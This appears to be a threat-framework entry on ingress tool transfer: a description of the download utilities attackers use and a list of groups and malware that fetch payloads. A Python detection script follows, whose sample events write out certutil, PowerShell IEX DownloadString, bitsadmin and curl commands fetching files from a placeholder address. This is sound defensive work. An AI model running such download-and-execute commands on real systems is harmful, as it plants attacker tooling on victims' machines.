Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer or spread tools between victim devices within a compromised environment.

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.

Files can also be transferred using various web services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.

Procedure examples:

During the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.
ABK has the ability to download files from C2.
Action RAT has the ability to download additional payloads onto an infected machine.
Agent Tesla can download additional files for execution on the victim's machine.
Agent.btz attempts to download an encrypted binary from a specified domain.
Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.
Amadey can download and execute files to further infect a host machine with additional malware.
Andariel has downloaded additional tools and malware onto compromised hosts.
ANDROMEDA can download additional payloads from C2.
APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.
APT18 can upload a file to the victim's machine.
APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.
APT29 has downloaded additional tools and malware onto compromised networks.
APT3 has a tool that can copy files to remote machines.
APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.
APT33 has downloaded additional files and programs from its C2 server.
APT37 has downloaded second stage malware from compromised websites.
APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim's machine.
APT39 has downloaded tools to compromised hosts.
APT41 used certutil to download additional files.
Aquatic Panda has downloaded additional malware onto compromised hosts.
Aria-body has the ability to download additional payloads from C2.
Astaroth uses certutil and BITSAdmin to download additional malware.
AsyncRAT has the ability to download files over SFTP.
Attor can download additional plugins, updates and other files.
AuditCred can download files and additional malware.
Avenger has the ability to download files from C2 to a compromised host.
Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.
BabyShark has downloaded additional files from the C2.
BackConfig can download and execute additional payloads on a compromised host.
Backdoor.Oldrea can download additional modules from C2.
BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.
BADFLICK has downloaded files from its C2 server.
BADHATCH has the ability to load a second stage malicious DLL file onto a compromised machine.
BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.
BadPatch can download and execute or update malware.
Bandook can download files to the system.
Bankshot uploads files and secondary payloads to the victim's machine.
Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.
BBK has the ability to download files from C2 to the infected host.
BendyBear is designed to download an implant from a C2 server.
BISCUIT has a command to download a file from the C2 server.
Bisonal has the capability to download files to execute on the victim's machine.
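As an added detection illustration that is not part of the original page, the following Python scans constructed process-creation events for the download utilities the description names (certutil, BITSAdmin, the PowerShell Net.WebClient and Invoke-WebRequest patterns, curl, wget and the Unix copy tools), escalates hits whose parent is an Office application, and suppresses fetches from an assumed allowlist of internal hosts. The hosts, paths, addresses and allowlist are all hypothetical.

```python
import re

# Constructed process-creation events for illustration: (host, parent image, command line).
# Hosts, paths, 198.51.100.7 and the *.example names are hypothetical placeholders.
SAMPLE_EVENTS = [
    ("ws01", "winword.exe", "certutil.exe -urlcache -split -f http://198.51.100.7/update.dat C:\\Users\\Public\\u.dat"),
    ("ws01", "explorer.exe", "certutil.exe -hashfile C:\\Users\\Public\\setup.msi SHA256"),
    ("ws02", "winword.exe", "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\""),
    ("ws02", "powershell.exe", "powershell.exe Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile report.csv"),
    ("srv01", "cmd.exe", "bitsadmin.exe /transfer job /download /priority high http://198.51.100.7/t.exe C:\\ProgramData\\t.exe"),
    ("lx01", "bash", "curl -s http://198.51.100.7/x.sh -o /tmp/x.sh"),
    ("lx01", "bash", "wget https://mirror.example/ubuntu.iso"),
    ("lx02", "bash", "grep -r certutil /var/log"),
]

URL = r"(?:https?|ftp|tftp|sftp)://\S+"
# One rule per download utility from the description; the first match decides the alert name.
RULES = [
    ("certutil_urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*" + URL, re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*" + URL, re.I)),
    ("powershell_webclient", re.compile(r"Net\.WebClient\b.*\.Download(?:String|File)\(", re.I)),
    ("powershell_iwr", re.compile(r"\bInvoke-WebRequest\b|\biwr\b", re.I)),
    ("curl_wget", re.compile(r"^(?:curl|wget)\b.*" + URL, re.I)),
    ("scp_sftp_tftp_rsync", re.compile(r"^(?:scp|sftp|tftp|rsync)\b", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
TRUSTED_HOSTS = {"intranet.example", "mirror.example"}  # assumed organisational allowlist


def url_host(cmd):
    """Return the host of the first URL in a command line, or None if there is none."""
    m = re.search(r"(?:https?|ftp|tftp|sftp)://([^/\s:'\"]+)", cmd, re.I)
    return m.group(1).lower() if m else None


def scan(events):
    """Return (host, rule, severity, command_line) for every event that matches a rule."""
    alerts = []
    for host, parent, cmd in events:
        if url_host(cmd) in TRUSTED_HOSTS:
            continue  # fetch from an allowlisted host; tune this set to your environment
        for name, pattern in RULES:
            if pattern.search(cmd):
                # A document reader spawning a downloader is far more suspicious than an admin shell.
                severity = "high" if parent.lower() in OFFICE_PARENTS else "medium"
                alerts.append((host, name, severity, cmd))
                break  # one alert per event
    return alerts
```

Feed it your own EDR or Sysmon event ID 1 command lines in the same (host, parent, command) shape; the allowlist and parent set are the knobs that control false positives.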